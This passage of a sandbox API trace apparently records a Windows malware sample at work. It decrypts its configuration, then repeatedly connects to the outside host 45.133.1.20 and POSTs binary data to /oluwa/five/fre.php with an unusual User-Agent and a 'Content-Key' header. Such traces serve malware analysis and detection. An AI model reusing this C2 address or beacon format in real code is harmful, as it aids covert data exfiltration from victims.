(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.247] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.248] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.250] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.250] GetProcessHeap () returned 0x6a0000 [0273.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0273.250] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0273.250] GetProcessHeap () returned 0x6a0000 [0273.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0273.251] GetProcessHeap () returned 0x6a0000 [0273.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.255] GetProcessHeap () returned 0x6a0000 [0273.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0273.255] GetProcessHeap () returned 0x6a0000 [0273.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0273.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.257] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.269] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0273.279] GetProcessHeap () returned 0x6a0000 [0273.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.281] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0273.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.282] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.287] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.287] GetProcessHeap () returned 0x6a0000 [0273.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.288] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0273.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.290] CryptDestroyKey (hKey=0x6ad020) returned 1 [0273.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.291] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0273.291] GetProcessHeap () returned 0x6a0000 [0273.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.293] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0273.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.294] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0273.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.296] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0273.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.297] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0273.297] GetProcessHeap () returned 0x6a0000 [0273.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0273.297] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0273.297] GetProcessHeap () returned 0x6a0000 [0273.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0273.297] socket (af=2, type=1, protocol=6) returned 0x9b4 [0273.298] connect (s=0x9b4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0273.325] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0273.325] GetProcessHeap () returned 0x6a0000 [0273.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0273.325] GetProcessHeap () returned 0x6a0000 [0273.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0273.326] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.329] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0273.329] GetProcessHeap () returned 0x6a0000 [0273.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b99f0 [0273.329] GetProcessHeap () returned 0x6a0000 [0273.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.330] GetProcessHeap () returned 0x6a0000 [0273.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0273.330] GetProcessHeap () returned 0x6a0000 [0273.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0273.331] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.332] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0273.332] GetProcessHeap () returned 0x6a0000 [0273.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0273.332] GetProcessHeap () returned 0x6a0000 [0273.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.332] send (s=0x9b4, buf=0x6bd460*, len=242, flags=0) returned 242 [0273.333] send (s=0x9b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0273.333] GetProcessHeap () returned 0x6a0000 [0273.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0273.333] recv (in: s=0x9b4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0273.402] GetProcessHeap () returned 0x6a0000 [0273.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0273.403] GetProcessHeap () returned 0x6a0000 [0273.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0273.406] GetProcessHeap () returned 0x6a0000 [0273.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b99f0 | out: hHeap=0x6a0000) returned 1 [0273.406] GetProcessHeap () returned 0x6a0000 [0273.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0273.406] closesocket (s=0x9b4) returned 0 [0273.407] GetProcessHeap () returned 0x6a0000 [0273.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0273.407] GetProcessHeap () returned 0x6a0000 [0273.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.407] GetProcessHeap () returned 0x6a0000 [0273.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0273.408] GetProcessHeap () returned 0x6a0000 [0273.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0273.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1748) returned 0x9b4 [0273.410] Sleep (dwMilliseconds=0xea60) [0273.412] GetProcessHeap () returned 0x6a0000 [0273.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0273.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.413] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0273.432] GetProcessHeap () returned 0x6a0000 [0273.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.434] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0273.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.434] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.435] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.435] GetProcessHeap () returned 0x6a0000 [0273.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.437] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0273.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.440] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0273.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.441] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0273.441] GetProcessHeap () returned 0x6a0000 [0273.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.443] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.444] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.444] GetProcessHeap () returned 0x6a0000 [0273.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0273.444] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0273.451] GetProcessHeap () returned 0x6a0000 [0273.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0273.452] GetProcessHeap () returned 0x6a0000 [0273.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.452] GetProcessHeap () returned 0x6a0000 [0273.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0273.453] GetProcessHeap () returned 0x6a0000 [0273.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0273.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.454] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.459] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0273.465] GetProcessHeap () returned 0x6a0000 [0273.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.466] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0273.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.467] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.469] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.469] GetProcessHeap () returned 0x6a0000 [0273.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.479] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0273.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.481] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0273.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.484] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0273.484] GetProcessHeap () returned 0x6a0000 [0273.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.485] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0273.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.486] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0273.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.487] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0273.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.488] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0273.488] GetProcessHeap () returned 0x6a0000 [0273.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0273.488] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0273.488] GetProcessHeap () returned 0x6a0000 [0273.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0273.488] socket (af=2, type=1, protocol=6) returned 0x9b8 [0273.489] connect (s=0x9b8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0273.517] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0273.517] GetProcessHeap () returned 0x6a0000 [0273.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0273.517] GetProcessHeap () returned 0x6a0000 [0273.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0273.518] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.519] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0273.519] GetProcessHeap () returned 0x6a0000 [0273.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba230 [0273.519] GetProcessHeap () returned 0x6a0000 [0273.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.520] GetProcessHeap () returned 0x6a0000 [0273.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0273.520] GetProcessHeap () returned 0x6a0000 [0273.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0273.521] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.522] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0273.522] GetProcessHeap () returned 0x6a0000 [0273.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0273.522] GetProcessHeap () returned 0x6a0000 [0273.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.522] send (s=0x9b8, buf=0x6bd460*, len=242, flags=0) returned 242 [0273.523] send (s=0x9b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0273.523] GetProcessHeap () returned 0x6a0000 [0273.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0273.523] recv (in: s=0x9b8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0273.598] GetProcessHeap () returned 0x6a0000 [0273.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0273.599] GetProcessHeap () returned 0x6a0000 [0273.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0273.600] GetProcessHeap () returned 0x6a0000 [0273.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba230 | out: hHeap=0x6a0000) returned 1 [0273.600] GetProcessHeap () returned 0x6a0000 [0273.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0273.600] closesocket (s=0x9b8) returned 0 [0273.601] GetProcessHeap () returned 0x6a0000 [0273.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0273.601] GetProcessHeap () returned 0x6a0000 [0273.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.602] GetProcessHeap () returned 0x6a0000 [0273.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0273.603] GetProcessHeap () returned 0x6a0000 [0273.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0273.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x174c) returned 0x9b8 [0273.608] Sleep (dwMilliseconds=0xea60) [0273.609] GetProcessHeap () returned 0x6a0000 [0273.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0273.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.611] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0273.630] GetProcessHeap () returned 0x6a0000 [0273.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.634] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0273.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.636] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.640] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.640] GetProcessHeap () returned 0x6a0000 [0273.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.642] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0273.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.643] CryptDestroyKey (hKey=0x6ad020) returned 1 [0273.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.644] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0273.644] GetProcessHeap () returned 0x6a0000 [0273.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.646] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.650] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.652] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.653] StrStrA 